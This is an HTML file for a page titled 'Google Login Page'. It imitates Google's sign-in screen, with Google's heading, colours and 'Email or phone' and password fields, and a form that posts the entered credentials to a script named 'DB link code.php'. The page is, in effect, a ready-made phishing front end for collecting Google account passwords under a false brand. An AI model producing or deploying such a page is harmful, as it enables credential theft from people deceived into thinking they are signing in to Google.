<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <title>Google Login Page</title>
    <style>
      /* CSS styles for the page */
      body {
        background-color: #fff;
        font-family: 'Roboto', sans-serif;
      }
      .container {
        margin: 0 auto;
        width: 340px;
        text-align: center;
        padding-top: 100px;
      }
      h1 {
        font-size: 24px;
        margin-bottom: 30px;
      }
      input[type=text], input[type=password] {
        width: 100%;
        padding: 15px;
        margin-bottom: 15px;
        border: none;
        border-radius: 3px;
        background-color: #f2f2f2;
      }
      button[type=submit] {
        background-color: #4285f4;
        color: #fff;
        border: none;
        border-radius: 3px;
        font-size: 16px;
        padding: 15px;
        width: 100%;
        cursor: pointer;
      }
      button[type=submit]:hover {
        background-color: #357ae8;
      }
      .forgot {
        text-align: left;
        margin-top: 15px;
        font-size: 14px;
        color: #757575;
        text-decoration: none;
      }
      a {
        text-decoration: none;
        color: #4285f4;
      }
    </style>
  </head>
  <body>
    <div class="container">
      <h1>Sign in</h1>
      <form action="DB link code.php" method="post">
        <input type="text" id="username" name="username" placeholder="Email or phone" required>
        <br>
        <input type="password" id="password" name="password" placeholder="Password" required>
        <br>
        <button type="submit">Sign in</button>
        <br>
        <a href="#" class="forgot">Forgot password?</a>
      </form>
    </div>
  </body>
</html>
